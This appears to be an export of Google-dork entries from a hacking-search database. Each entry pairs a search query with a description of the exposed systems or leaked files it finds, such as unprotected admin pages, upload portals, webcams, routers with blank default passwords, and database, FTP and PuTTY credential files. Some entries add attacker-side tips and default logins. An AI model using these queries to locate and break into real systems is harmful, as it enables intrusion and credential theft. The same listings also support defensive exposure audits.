[[url]http://www.google.com/search?hl=en&q=%22Powered+by+WordPress%22+-html+filetype%3Aphp+-demo+-wordpress.org+-bugtraq&btnG=Google+Search[url]]
[[dork]"Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq[dork]]
[end][943]]
[[start][944]
[[title]intitle:upload inurl:upload intext:upload -forum -shop -support -w3c[[title]]
[[descr]The search reveals server upload portals.
An attacker can use server space for his own benefit.[descr]]
[[url]http://www.google.com/search?q=intitle%3Aupload+inurl%3Aupload+intext%3Aupload+-forum+-shop+-support+-w3c+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en[url]]
[[dork]intitle:upload inurl:upload intext:upload -forum -shop -support -w3c [dork]]
[end][944]]
[[start][947]
[[title]intitle:"SpeedStream * Management Interface"[title]]
[[descr]a lot of Speed stream routers :)[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22SpeedStream+*+Management+Interface%22&btnG=Search[url]]
[[dork]intitle:"SpeedStream * Management Interface"[dork]]
[end][947]]
[[start][948]
[[title]intitle:"HFS /" +"HttpFileServer"[title]]
[[descr]"The HttpFileServer is a Java based mechanism for providing web access to a set of files on a server. This is very similar to Apache Directory Indexing but provides the ability to upload files as well."
http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=1516[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][948]]
[[start][950]
[[title]inurl:"next_file=main_fs.htm" inurl:img inurl:image.cgi[[title]]
[[descr]Linksys Wireless-G web cams.[descr]]
[[url]http://www.google.com/search?q=inurl:%22next_file=main_fs.htm%22+inurl:img+inurl:image.cgi[url]]
[[dork]inurl:"next_file=main_fs.htm" inurl:img inurl:image.cgi[dork]]
[end][950]]
[[start][951]
[[title]"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row[[title]]
[[descr]This is a more specific search for the vulnerable PhpNuke index already seen on this website.
PhpNuke asks you to set up an admin account when it is first installed. This search is a list of people who never set up that account! It will take you directly to the administrator registration of a vulnerable server. The -mysql_fetch_row will remove listings where SQL is simply broken.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=%22There+are+no+Administrators+Accounts%22+inurl%3Aadmin.php+-mysql_fetch_row[url]]
[[dork]"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row[dork]]
[end][951]]
[[start][954]
[[title]filetype:ctt Contact[[title]]
[[descr]This is for MSN Contact lists...[descr]]
[[url]http://www.google.com/search?hl=en&lr=&safe=off&c2coff=1&q=filetype%3Actt+Contact&btnG=Search[url]]
[[dork]filetype:ctt Contact[dork]]
[end][954]]
[[start][955]
[[title]Peoples MSN contact lists[[title]]
[[descr]This will give msn contact lists .. modify the "msn" to what ever you feel is messenger related[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=filetype%3Actt+%22msn%22&btnG=Search[url]]
[[dork]filetype:ctt "msn"[dork]]
[end][955]]
[[start][957]
[[title]inurl:servlet/webacc[[title]]
[[descr]I was playing around on the net when I found a small problem with Novell's WebAcces. With User.lang you can give in you're language as parameter I tried some different stuff there and when I tried "> so that the URL would be hxxp://www.notsohappyserver.com/servlet/webacc?User.Lang="> this link appeared I clicked it and so I found unprotected dirs.
In hxxp://www.notsohappyserver.com/com/novell/webaccess/ is a file called WebAccessUninstall.ini and this file contains info like servernames installationpaths and servers context[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=inurl%3Aservlet%2Fwebacc[url]]
[[dork]inurl:servlet/webacc[dork]]
[end][957]]
[[start][958]
[[title]"Web File Browser" "Use regular expression"[title]]
[[descr]This will ask google to search for a php script used to manage files on a server. The script "Web File Browser" enables users to change files on the server. The script comes un-protected, which means that anyone who knows the exact path of the php file can have admin access to files on that server. [descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][958]]
[[start][959]
[[title]intext:gmail invite intext:http://gmail.google.com/gmail/a[[title]]
[[descr]This is a dork I did today. At first, I wanted to find out the formula for making one, but ... It got boring, so I just made a dork that finds invites. If you want to get specific, try adding "+blog", "+livejournal", or , "+forum".[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=intext%3Agmail+invite+intext%3Ahttp%3A%2F%2Fgmail.google.com%2Fgmail%2Fa&btnG=Search[url]]
[[dork]intext:gmail invite intext:http://gmail.google.com/gmail/a[dork]]
[end][959]]
[[start][960]
[[title]filetype:cgi transcoder.cgi[[title]]
[[descr]Digital Video Recorder by SnapStream. It is possible on misconfigured machines to stream video off these devices.[descr]]
[[url]http://www.google.com/search?q=filetype:cgi+transcoder.cgi&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]filetype:cgi transcoder.cgi[dork]]
[end][960]]
[[start][961]
[[title]intitle:"Setup Home" "You will need * log in before * * change * settings"[title]]
[[descr]This should reveal Belkin routers. Interestingly, Belkin routers by default have remote administration on, and act as a webserver for administration. Also by default, their password is blank (and the login page helpfuly informs the attacker of this).
Once he's in, there's all kinds of annoying stuff he could get into, and it could also be used more blackhackishly to disable security.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Setup+Home%22+%22You+will+need+*+log+in+before+*+*+change+*+settings%22[url]]
[[dork]intitle:"Setup Home" "You will need * log in before * * change * settings"[dork]]
[end][961]]
[[start][963]
[[title]"Index of" rar r01 nfo Modified 2004[[title]]
[[descr]New Warez Directory Lists[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][963]]
[[start][964]
[[title]intitle:"Network Print Server" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )[[title]]
[[descr]Axis Network Print Server devices. This search has all the possible urls (more than strictly needed), but those are added in case Google decides to index them in the future.[descr]]
[[url]http://www.google.com/search?q=intitle:%22Network+Print+Server%22+filetype:shtm+(+inurl:u_printjobs+%7C+inurl:u_server+%7C+inurl:a_server+%7C+inurl:u_generalhelp+%7C+u_printjobs+)&num=100&hl=en&lr=&fi[url]]
[[dork]intitle:"Network Print Server" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )[dork]]
[end][964]]
[[start][965]
[[title]intitle:"Network Print Server" intext:"http://www.axis.com" filetype:shtm[[title]]
[[descr]Axis Network Print Server devices (a better shorter search).[descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3A%22Network+Print+Server%22+intext%3A%22http%3A%2F%2Fwww.axis.com%22+filetype%3Ashtm[url]]
[[dork]intitle:"Network Print Server" intext:"http://www.axis.com" filetype:shtm[dork]]
[end][965]]
[[start][968]
[[title]"pcANYWHERE EXPRESS Java Client"[title]]
[[descr]This search will reveal the java script program that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web.[descr]]
[[url]http://www.google.com/search?q=%22pcANYWHERE+EXPRESS+Java+Client%22[url]]
[[dork]"pcANYWHERE EXPRESS Java Client"[dork]]
[end][968]]
[[start][969]
[[title]inurl:"Activex/default.htm" "Demo"[title]]
[[descr]This search will reveal the active X plugin page that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%22Activex%2Fdefault.htm%22+%22Demo%22[url]]
[[dork]inurl:"Activex/default.htm" "Demo"[dork]]
[end][969]]
[[start][970]
[[title]intitle:"FTP root at"[title]]
[[descr]This dork will return some FTP root directories. The string can be made more specific by adding additional keywords like password.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3A%22FTP+root+at%22[url]]
[[dork]intitle:"FTP root at"[dork]]
[end][970]]
[[start][971]
[[title]intitle:"VNC viewer for Java"[title]]
[[descr]VNC (Virtual Network Computing) allows a pc to be controlled remotely over the Internet. These are the password protected but still shouldn't be allowed to be indexed by Google by accident.[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22VNC+viewer+for+Java%22[url]]
[[dork]intitle:"VNC viewer for Java"[dork]]
[end][971]]
[[start][972]
[[title]filetype:torrent torrent[[title]]
[[descr]Torrent files .. don't expect to find spectacular stuff with this kind of string, this just to shows you can use Google for all kinds of filetypes, not just pdf or html..[descr]]
[[url]http://www.google.com/search?hl=en&q=filetype%3Atorrent+torrent[url]]
[[dork]filetype:torrent torrent[dork]]
[end][972]]
[[start][973]
[[title]inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)[[title]]
[[descr]Administration pages for CUPS, The Common UNIX Printing System. Most are password protected.[descr]]
[[url]http://www.google.com/search?q=inurl:%22631/admin%22+(inurl:%22op%3D*%22)+%7C+(intitle:CUPS)+&num=100&hl=en&lr=&c2coff=1&filter=0[url]]
[[dork]inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS) [dork]]
[end][973]]
[[start][975]
[[title]W-Nailer Upload Area[[title]]
[[descr]What is W-Nailer?
W-Nailer is a PHP script which can create galleries for you.
It uses a graphical library (GD) which enables PHP to manipulate images, for instance resizing to create thumbnails.
W-Nailer is highly configurable to meet your needs. Even better, the configuration is nearly completely webbased.
So after you have uploaded your files, you will just need your browser![descr]]
[[url]http://www.google.com/search?q=uploadpics.php%3Fdid%3D+-forum[url]]
[[dork]uploadpics.php?did= -forum[dork]]
[end][975]]
[[start][976]
[[title]PHPhotoalbum Upload[[title]]
[[descr]Homepage: http://www.stoverud.com/PHPhotoalbum/
PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22PHPhotoalbum+-+Upload%22+%7C+inurl%3A%22PHPhotoalbum%2Fupload%22[url]]
[[dork]intitle:"PHPhotoalbum - Upload" | inurl:"PHPhotoalbum/upload"[dork]]
[end][976]]
[[start][977]
[[title]PHPhotoalbum Statistics[[title]]
[[descr]PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums.[descr]]
[[url]http://www.google.com/search?q=inurl%3APHPhotoalbum%2Fstatistics+intitle%3A%22PHPhotoalbum+-+Statistics%22[url]]
[[dork]inurl:PHPhotoalbum/statistics intitle:"PHPhotoalbum - Statistics"[dork]]
[end][977]]
[[start][978]
[[title]PhotoPost PHP Upload[[title]]
[[descr]PhotoPost was designed to help you give your users exactly what they want. Your users will be thrilled to finally be able to upload and display their photos for your entire community to view and discuss, all with no more effort than it takes to post a text message to a forum.
Over 3,500 web sites are powered by PhotoPost today. These customers trusted our software to simplify their lives as webmasters, and to meet the needs of their users.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=-Login+inurl%3Aphotopost%2Fuploadphoto.php&btnG=Search[url]]
[[dork]-Login inurl:photopost/uploadphoto.php[dork]]
[end][978]]
[[start][979]
[[title]uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album[[title]]
[[descr]Product: PHPix
Version: 1.0
Vuln: Directory traversal
PHPix is a Web-based photo album viewer written in PHP. It features automatic generation of thumbnails and different resolution files for viewing on the fly. Synnergy Labs has found a flaw within PHPix that allows a user to successfully traverse the file system on a remote host, allowing arbitrary files/folders to be read.
http://www.securiteam.com/unixfocus/6G00K0K04K.html[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][979]]
[[start][980]
[[title]XAMPP "inurl:xampp/index"[title]]
[[descr]XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. At the moment there are three XAMPP distributions.
-allows you to write emails (mercury Mail)
-some phpmyadmin are unprotected
-security details of the server
-maybe some more things ;-)[descr]]
[[url]http://www.google.com/search?client=safari&rls=en&q=XAMPP+%22inurl:xampp/index%22&ie=UTF-8&oe=UTF-8[url]]
[[dork]XAMPP "inurl:xampp/index"[dork]]
[end][980]]
[[start][981]
[[title]intitle:"Browser Launch Page"[title]]
[[descr]An ActiveX based webcam - so use MS IE[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][981]]
[[start][982]
[[title]intext:"Mail admins login here to administrate your domain."[title]]
[[descr]Another way to locate Postfix admin logon pages.[descr]]
[[url]http://www.google.com/search?hl=en&q=intext%3A%22Mail+admins+login+here+to+administrate+your+domain.%22[url]]
[[dork]intext:"Mail admins login here to administrate your domain."[dork]]
[end][982]]
[[start][983]
[[title]inurl:citrix/metaframexp/default/login.asp? ClientDetection=On[[title]]
[[descr]Citrix (http://citrix.com) is a web application that allows remote access via a client for companies, institutions, and government agencies to "published" folders, files, drives, and applications on the server and often the attached network. There is a XSS vulnerability in a widely used version of their Web Interface.
As reported on Securiteam.com:
http://www.securiteam.com/securitynews/6X0020K8VW.html
A simple test is inlcluded in the advisory.
[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Acitrix%2Fmetaframexp%2Fdefault%2Flogin.asp%3FClientDetection%3DOn&btnG=Google+Search[url]]
[[dork]inurl:citrix/metaframexp/default/login.asp?ClientDetection=On[dork]]
[end][983]]
[[start][984]
[[title]intitle:"welcome to arcserve 7.0 advanced edition"[title]]
[[descr]No need to explain.. Arcserve 7.0 web interface!
http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=1628[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22welcome+to+arcserve+7.0+advanced+edition%22[url]]
[[dork]intitle:"welcome to arcserve 7.0 advanced edition"[dork]]
[end][984]]
[[start][985]
[[title][[title]]
[[descr][descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][985]]
[[start][986]
[[title]ext:txt inurl:dxdiag[[title]]
[[descr]This will find text dumps of the DirectX Diag utility. It gives an outline of the hardware of the computer, and goes into quite a bit of detail listing driver versions and such. I can't think of any serious security implacations of this data, but I'll leave it to your imagination.[descr]]
[[url]http://www.google.com/search?q=ext%3Atxt+inurl%3Adxdiag&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-GB:official[url]]
[[dork]ext:txt inurl:dxdiag[dork]]
[end][986]]
[[start][989]
[[title]inurl:"usysinfo?login=true"[title]]
[[descr]Dell OpenManage enables remote execution of tasks such as system configuration, imaging, application installation and support. It also used to track hardware and software inventory, to update configurations, drivers, OS and applications and to proactively monitor and correct fault conditions
Dell OpenManage standards include the Common Information Model (CIM), Desktop Management Interface (DMI), Simple Network Management Protocol (SNMP), and Wired for Management (WfM).
Another possible search for this is:
"Log in." inurl:1311/servlet/[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22usysinfo%3Flogin%3Dtrue%22[url]]
[[dork]inurl:"usysinfo?login=true"[dork]]
[end][989]]
[[start][990]
[[title]inurl:"/NSearch/AdminServlet"[title]]
[[descr]This search brings up results for Novell NetWare's Web Search Manager.. at best the sites will be password protected, at worst the site will require no authentication - allowing full control over a site's 'virtual search servers'.[descr]]
[[url]http://www.google.com/search?q=inurl:%22/NSearch/AdminServlet%22&filter=0[url]]
[[dork]inurl:"/NSearch/AdminServlet"[dork]]
[end][990]]
[[start][991]
[[title]"Netware * Home" inurl:nav.html[[title]]
[[descr]Rather than submitting various searches for all kinds of NetWare related pages, Novell NetWare's Home Page is a good place to start for profiling the services available on a NetWare powered system. The results will often include all (or at least some) of the following links to different services on a system - including Server Certificates, iFolder, iManager, NetStorage, Enterprise Web Server Management and the Web Search Manager![descr]]
[[url]http://www.google.com/search?hl=en&q=%22Netware+*+Home%22+inurl%3Anav.html[url]]
[[dork]"Netware * Home" inurl:nav.html[dork]]
[end][991]]
[[start][992]
[[title]intext:"Error Message : Error loading required libraries."[title]]
[[descr]This throws up pages which contain "CGI ERROR" reports - which include the file (and line number) of the errors occurence, the version of Perl being used, detailed server information (of the form "Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.2 mod_perl/1.26"), usernames, setup file names, form / query information, port and path information, etc.. perfect for system-profiling![descr]]
[[url]http://www.google.com/search?hl=en&q=intext%3A%22Error+Message+%3A+Error+loading+required+libraries.%22[url]]
[[dork]intext:"Error Message : Error loading required libraries."[dork]]
[end][992]]
[[start][993]
[[title]ext:reg "username=*" putty[[title]]
[[descr]Putty registry entries. Contain username and hostname pairs, as well as type of session (sftp, xterm, etc).[descr]]
[[url]http://www.google.com/search?num=50&q=ext%3Areg+%22username%3D*%22+putty[url]]
[[dork]ext:reg "username=*" putty[dork]]
[end][993]]
[[start][994]
[[title]allinurl:index.htm?cus?audio[[title]]
[[descr]This will find webcams made by Sweex, Orite and others. Supports motion detection, ftp, smtp and save to .avi. Needs ActiveX so works for IE/win only .. [descr]]
[[url]http://www.google.com/search?&q=allinurl%3Aindex.htm%3Fcus%3Faudio[url]]
[[dork]allinurl:index.htm?cus?audio[dork]]
[end][994]]
[[start][995]
[[title]intitle:"edna:streaming mp3 server" -forums[[title]]
[[descr]Edna allows you to access your MP3 collection from any networked computer. This software streams your MP3s via HTTP to any MP3 player that supports playing off a remote connection (e.g. Winamp, FreeAmp, Sonique, XMMS).
Stats pages were found (by klouw) with:
"edna:*" intitle:"edna: Site Statistics" [descr]]
[[url]http://www.google.com/search?q=intitle%3A%22edna%3Astreaming+mp3+server%22+-forums[url]]
[[dork]intitle:"edna:streaming mp3 server" -forums[dork]]
[end][995]]
[[start][996]
[[title]intitle:"ePowerSwitch Login"[title]]
[[descr]With ePowerSwitch D4 Guard, up to four devices can be individually switched on and off, also with programmed switching states. The activated Guard function ensures exceptionally high equipment availability: continually monitors whether the connected IP-based devices are still active, it can automatically, without user input, reboot any crashed device.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22ePowerSwitch+Login%22&btnG=Search[url]]
[[dork]intitle:"ePowerSwitch Login"[dork]]
[end][996]]
[[start][997]
[[title]ext:ini Version=4.0.0.4 password[[title]]
[[descr]The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more. This is a more specific search for ServU passwords base on a previous dork by Cybercide.[descr]]
[[url]http://www.google.com/search?q=ext%3Aini+Version%3D4.0.0.4+password[url]]
[[dork]ext:ini Version=4.0.0.4 password[dork]]
[end][997]]
[[start][998]
[[title]inurl:orasso.wwsso_app_admin.ls_login[[title]]
[[descr]Oracle provides a Single Sign-On solution which is quite widely spread as it integrates quite seemlessly into exisitng appllications (as Oracle says).
If the link itself shows an empty page, try the directory below. [descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][998]]
[[start][999]
[[title]inurl:oraweb -site:oraweb.org[[title]]
[[descr]Oracle administrators tend to naming their servers ora* - maybe because they forget the name of their database all the time.
So the Oracle webserver is very often named oraweb.[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Aoraweb+-site%3Aoraweb.org&btnG=Search[url]]
[[dork]inurl:oraweb -site:oraweb.org[dork]]
[end][999]]
[[start][1000]
[[title]intitle:Group-Office "Enter your username and password to login"[title]]
[[descr]Group-Office is a Groupware suite containing a base system and different modules. The modules are designed in a way that groups of people can collaborate online. [descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1000]]
[[start][1001]
[[title]inurl:"8003/Display?what="[title]]
[[descr]Norton AntiVirus for Gateways
Easily administered from anywhere via an HTML interface, it scans compressed and encoded files at the SMTP gateway, including a nearly unlimited number of file extensions in ZIP®, UUENCODE, and MIME formats. Administrators have flexible options for handling infected files, scheduling virus definition updates via LiveUpdate™, and generating reports.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1001]]
[[start][1002]
[[title]intitle:"EverFocus.EDSR.applet"[title]]
[[descr]The new EDSR-1600 (16-channel), EDSR-900 (9-channel) and EDSR-600 (6-channel) digital video recorders offer all digital video recording benefits and are easy to install and operate like a custom VCR. Moreover, the 16 & 9 channel devices are the first Digital Video Recorders with an integrated 16x4 basic matrix function. Existing multiplexers can be connected via a switch output. Alarms are managed via external alarm inputs and outputs.[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22EverFocus.EDSR.applet%22[url]]
[[dork]intitle:"EverFocus.EDSR.applet"[dork]]
[end][1002]]
[[start][1003]
[[title]inurl:netscape.ini[[title]]
[[descr]There's a bunch of interesting info in netscape.ini
1. Viewers: which multimedia viewers the firm or people are using
2.Cookies
3.Address Book
4.Mail- If pop3 is used you will see login and password.
5.Java - will tell the attacker if his victim has Java enabled.
6.URL History - The last sites visited
URL_1=http://edtech.xxxx.fi/
URL_2=C:\Tx\ixxx_t3.htm
URL_3=http://www.xxx.com/welcome/
URL_4=http://xxx.netscape.com
7.User Trusted External Applications
[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1003]]
[[start][1004]
[[title]inurl:netscape.hst[[title]]
[[descr]Netscape Bookmark List/History: So an attacker would be able to locate the bookmark and history list[descr]]
[[url]http://www.google.com/search?q=inurl%3Anetscape.hst+[url]]
[[dork]inurl:netscape.hst [dork]]
[end][1004]]
[[start][1005]
[[title]inurl:"bookmark.htm"[title]]
[[descr]Bookmarks for Netscape and various other browsers.[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22bookmark.htm%22[url]]
[[dork]inurl:"bookmark.htm"[dork]]
[end][1005]]
[[start][1006]
[[title]inurl:netscape.hst[[title]]
[[descr]History for Netscape - So an attacker can read a user's browsing history.[descr]]
[[url]http://www.google.com/search?q=inurl%3Anetscape.hst+[url]]
[[dork]inurl:netscape.hst [dork]]
[end][1006]]
[[start][1009]
[[title]"powered | performed by Beyond Security's Automated Scanning" -kazaa -example[[title]]
[[descr]This search finds Beyond Security reports. Beyond Security sells a box which performs automated testing (the product is based on Nessus). The Beyond Security report will help an attacker find vulnerabile services at the attackees site.
This dork was found by Jamuse. A cleanup was done by Wolveso.
Please note: Both current (feb 2005) results are verifiable as samples - they're linked from pages on the sites they belong to, as sample reports. But you never know when Google might find some real one's to play with ?![descr]]
[[url]http://www.google.com/search?q=%22powered+%7C+performed+by+Beyond+Security%27s+Automated+Scanning%22+-kazaa+-example[url]]
[[dork]"powered | performed by Beyond Security's Automated Scanning" -kazaa -example[dork]]
[end][1009]]
[[start][1012]
[[title]intitle:"EpsonNet WebAssist Rev"[title]]
[[descr]This reveals the Epson Web Assist page (internal to the machine)[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22EpsonNet+WebAssist+Rev%22[url]]
[[dork]intitle:"EpsonNet WebAssist Rev"[dork]]
[end][1012]]
[[start][1013]
[[title]"SquirrelMail version 1.4.4" inurl:src ext:php[[title]]
[[descr]date :Jan 30 2005
this search reveal the src/webmail.php which would allow a
crafted URL to include a remote web page. This was assigned CAN-2005-0103
by the Common Vulnerabilities and Exposures.
-what can possibly be done :
*A possible cross site scripting issue exists in src/webmail.php that is
only accessible when the PHP installation is running with register_globals
set to On.
*A possible local file inclusion issue was uncovered by one of our
developers involving custom preference handlers. This issue is only
active if the PHP installation is running with register_globals set to On.
[descr]]
[[url]http://www.google.com/search?q=%22SquirrelMail+version+1.4.4%22+inurl%3Asrc+ext%3Aphp[url]]
[[dork]"SquirrelMail version 1.4.4" inurl:src ext:php[dork]]
[end][1013]]
[[start][1014]
[[title]inurl:na_admin[[title]]
[[descr]This searches for the admin pages for a "Network Appliance" box. An authenticated user could get access to a their data - all of it, in fact up to 100's Tb of it.
This is also part of cgi scanning tools like: http://www.cirt.net/nikto/UPDATES/1.34/scan_database.db
[descr]]
[[url]http://www.google.com/search?q=inurl%3Ana_admin[url]]
[[dork]inurl:na_admin[dork]]
[end][1014]]
[[start][1015]
[[title]intitle:"Connection Status" intext:"Current login"[title]]
[[descr]This is an intriguing way of finding various '5861 DMT Routers' - the presence of a web-interface to the router also indicates the presence of a telnet interface to the router![descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Connection+Status%22+intext%3A%22Current+login%22[url]]
[[dork]intitle:"Connection Status" intext:"Current login"[dork]]
[end][1015]]
[[start][1016]
[[title]intitle:"welcome to netware *" -site:novell.com[[title]]
[[descr]Novell login portals offering various services storage, printing, email or LDAP access[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22welcome+to+netware+*%22+-site%3Anovell.com[url]]
[[dork]intitle:"welcome to netware *" -site:novell.com[dork]]
[end][1016]]
[[start][1017]
[[title]intitle:"Brother" intext:"View Configuration" intext:"Brother Industries, Ltd."[title]]
[[descr]Finds a real bunch of Brother printers[descr]]
[[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2004-50,GGLD:en&q=intitle%3A%22Brother%22+intext%3A%22View+Configuration%22+intext%3A%22Brother+Industries%2C+Ltd%2E%22[url]]
[[dork]intitle:"Brother" intext:"View Configuration" intext:"Brother Industries, Ltd."[dork]]
[end][1017]]
[[start][1018]
[[title]filetype:inc mysql_connect OR mysql_pconnect[[title]]
[[descr]INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database.[descr]]
[[url]http://www.google.com/search?q=filetype%3Ainc+mysql_connect+OR+mysql_pconnect[url]]
[[dork]filetype:inc mysql_connect OR mysql_pconnect[dork]]
[end][1018]]
[[start][1019]
[[title]"IceWarp Web Mail 5.3.0" "Powered by IceWarp"[title]]
[[descr]IceWarp Web Mail 5.3.0
Multiple cross-site scripting and HTML injection vulnerabilities.
http://www.securityfocus.com/bid/12396/[descr]]
[[url]http://www.google.com/search?q=%22IceWarp+Web+Mail+5.3.0%22+%22Powered+by+IceWarp%22[url]]
[[dork]"IceWarp Web Mail 5.3.0" "Powered by IceWarp"[dork]]
[end][1019]]
[[start][1020]
[[title]"Powered by DUpaypal" -site:duware.com[[title]]
[[descr]Here is another DUware product, DUpaypal. Once you get hold of the database it contains the admin username and password. The default by the way is admin/password
The default location for the database is ../_private/DUpaypal.mdb[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+DUpaypal%22+-site%3Aduware.com&btnG=Search&hl=en&lr=&c2coff=1[url]]
[[dork]"Powered by DUpaypal" -site:duware.com[dork]]
[end][1020]]
[[start][1032]
[[title]-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp[[title]]
[[descr]Scripts to view the source code of PHP scripts running on the server. Can be very interesting if it is also allowed to open configuration files ;-)[descr]]
[[url]http://www.google.com/search?q=-site%3Aphp.net+-%22The+PHP+Group%22+inurl%3Asource++inurl%3Aurl+ext%3ApHp[url]]
[[dork]-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp[dork]]
[end][1032]]
[[start][1033]
[[title]"Microsoft CRM : Unsupported Browser Version"[title]]
[[descr]Microsoft CRM Login portal.
MS says:
Microsoft CRM integrates with Microsoft Office, Microsoft Business Solutions for Financial Management, and other business systems to give employees a complete view of customer information. The ease of integration with Microsoft Office is of particular value—enabling staff to access Microsoft CRM information from Microsoft Office Outlook and work online or offline with access to sales functionality. [descr]]
[[url]http://www.google.com/search?q=%22Microsoft+CRM+%3A+Unsupported+Browser+Version%22[url]]
[[dork]"Microsoft CRM : Unsupported Browser Version"[dork]]
[end][1033]]
[[start][1034]
[[title]intitle:"switch login" "IBM Fast Ethernet Desktop"[title]]
[[descr]IBM 8275 Model 416 High Performance Ethernet Workgroup Switch[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=intitle%3A%22switch+login%22+%22IBM+Fast+Ethernet+Desktop%22&btnG=Search[url]]
[[dork]intitle:"switch login" "IBM Fast Ethernet Desktop"[dork]]
[end][1034]]
[[start][1035]
[[title]"Powered by Link Department"[title]]
[[descr]Link management script with advanced yet easy to use admin control panel, fully template driven appearance, static HTML front-end and email notifications.
Below the link list a folder 'ld' exists which contains various juicy information like encrypted admin passwords and session data.
[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+Link+Department%22[url]]
[[dork]"Powered by Link Department"[dork]]
[end][1035]]
[[start][1036]
[[title]"Powered by MercuryBoard [v1"[title]]
[[descr]Exploit for MercuryBoard:
http://www.securityfocus.com/archive/1/389881/2005-02-06/2005-02-12/0
Enter the following search:
"Powered by MercuryBoard [v1"
And the exploit does work![descr]]
[[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+MercuryBoard+%5Bv1%22&btnG=Search[url]]
[[dork]"Powered by MercuryBoard [v1"[dork]]
[end][1036]]
[[start][1037]
[[title]intitle:"Index of" sc_serv.conf sc_serv content[[title]]
[[descr]This dork lists sc_serv.conf files. These files contain information for Shoutcast servers and often contain cleartext passwords.
Original dork: filetype:conf sc_serv.conf
Cleaned by: c0wz
Clean date: 2005-04-26
[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22Index+of%22+sc_serv.conf+sc_serv++content[url]]
[[dork]intitle:"Index of" sc_serv.conf sc_serv content[dork]]
[end][1037]]
[[start][1038]
[[title]intitle:"welcome to mono xsp"[title]]
[[descr]XSD is the demo webserver for the Mono project and allows the execution of ASP.NET on Unix[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22welcome+to+mono+xsp%22[url]]
[[dork]intitle:"welcome to mono xsp"[dork]]
[end][1038]]
[[start][1039]
[[title]intitle:"DEFAULT_CONFIG - HP"[title]]
[[descr]High scalable Ethernet switches by HP running in the default configuration[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22DEFAULT_CONFIG+-+HP%22[url]]
[[dork]intitle:"DEFAULT_CONFIG - HP"[dork]]
[end][1039]]
[[start][1040]
[[title]intitle:"web server status" SSH Telnet[[title]]
[[descr]Simple port scanners for most common ports [descr]]
